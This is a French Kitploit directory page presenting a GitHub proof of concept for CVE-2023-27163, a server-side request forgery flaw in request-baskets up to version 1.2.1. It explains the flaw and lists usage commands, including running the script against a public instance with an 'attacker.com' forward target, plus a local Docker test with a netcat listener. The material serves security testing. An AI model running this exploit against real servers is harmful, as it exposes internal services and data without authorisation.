Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-27163 — Preuve de concept pour Server Side Request Forgery (SSRF) dans request-baskets (<= v.1.2.1) | Kitploit
Outils/GitHubGitHub/entr0pie/cve-2023-27163
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubentr0pie/cve-2023-27163

CVE-2023-27163

Preuve de concept pour Server Side Request Forgery (SSRF) dans request-baskets (<= v.1.2.1)

Voir le dépôt
315il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Site web
Partager

Preuve de concept (PoC) de SSRF sur Request-Baskets (CVE-2023-27163)

Ce dépôt contient une preuve de concept (PoC) pour CVE-2023-27163, une vulnérabilité de Server-Side Request Forgery (SSRF) découverte dans request-baskets jusqu'à la version 1.2.1. Cette vulnérabilité permet aux attaquants d'accéder à des ressources réseau et à des informations sensibles en exploitant le composant /api/baskets/{name} via une requête API conçue.

Crédits à @b33t1e, @chelinboo147 et @houqinsheng (voir article).

Utilisation

root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
bash ./CVE-2023-27163.sh https://rbaskets.in/ http://attacker.com/

Comment ça fonctionne ?

Request-baskets est une application web conçue pour collecter et enregistrer les requêtes sur une route spécifique, appelée panier (basket). Lors de sa création, l'utilisateur peut spécifier un autre serveur pour transférer la requête. Le problème ici est que l'utilisateur peut spécifier des services non prévus, comme des applications fermées au réseau.

Par exemple : supposons que le serveur héberge Request-baskets (port 55555) et un serveur web Flask sur le port 8000. Flask est également configuré pour n'interagir qu'avec localhost. En créant un panier qui transfère vers http://localhost:8000, l'attaquant peut accéder au serveur web Flask auparavant restreint.

Test sur localhost

Image de la PoC

  1. Lancez le conteneur Docker de Request-Baskets
root@kitploit:~
docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
  1. Téléchargez la PoC
root@kitploit:~
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh
  1. Attendez une connexion
root@kitploit:~
nc -lvp 8000
  1. Enregistrez l'adresse IP de l'hôte Docker
root@kitploit:~
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
  1. Exécutez la PoC
root@kitploit:~
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/

Licence

Ce projet est sous Unlicense.

Télécharger l’outil